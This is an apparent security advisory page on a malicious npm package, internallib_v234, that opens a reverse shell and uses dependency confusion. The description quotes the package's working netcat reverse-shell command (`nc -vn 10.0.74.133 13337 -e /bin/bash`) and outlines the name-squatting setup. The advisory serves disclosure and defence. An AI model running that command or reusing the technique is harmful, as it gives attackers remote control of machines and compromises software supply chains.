Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

Malicious code in internallib_v234 (npm)

0
High
Published: 07/06/2026 (07/06/2026, 05:28:03 UTC)
Source: GCVE Database
Product: internallib_v234

Description

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087) [email protected] exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.

Affected software

npmghsa
internallib_v234
Affected versions
=1.0.3=1.0.5=1.0.6=1.0.7=1.0.4

Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 07/06/2026, 23:23:25 UTC

Technical Analysis

The npm package internallib_v234 versions 1.0.3, 1.0.4, 1.0.5, 1.0.6, and 1.0.7 exports a command() function that unconditionally executes a reverse shell command using netcat to connect to a hardcoded RFC1918 IP address (10.0.74.133) on port 13337. Before launching the shell, it verifies netcat presence by running 'whereis nc'. The package exhibits dependency confusion characteristics by mimicking an internal library name, declaring itself as its own dependency, and referencing a private Verdaccio registry in CI configurations. This suggests a targeted attack aiming to trick organizations into installing this malicious public package instead of their internal one, resulting in remote shell access on the installer's host.

Potential Impact

If installed and the command() function is invoked, the malicious package opens an interactive reverse shell to an attacker-controlled internal IP address, potentially allowing unauthorized remote code execution and full control over the affected system. This compromises the confidentiality, integrity, and availability of the host machine. The attack relies on the presence of netcat and the invocation of the exported function, so impact depends on usage patterns within the targeted environment.

Mitigation Recommendations

No official patch or remediation is currently documented. Organizations should avoid installing or invoking the public internallib_v234 package versions 1.0.3 through 1.0.7. Verify and enforce usage of the legitimate internal package from private registries. Review CI configurations to prevent accidental installation from public npm registries. Monitor for unexpected network connections to internal IPs like 10.0.74.133 on port 13337. Patch status is not yet confirmed — check vendor advisories or trusted sources for updates.

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Gcve Source
db.gcve.eu
Osv Id
MAL-2026-6796
Osv Schema Version
1.7.4
Aliases
[]
Ecosystems
["npm"]
Database Specific Severity
null
Cvss Version
null

Threat ID: 6a4c346b27e9c79719601cc0

Added to database: 07/06/2026, 23:04:11 UTC

Last enriched: 07/06/2026, 23:23:25 UTC

Last updated: 07/29/2026, 20:14:43 UTC

Views: 26

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses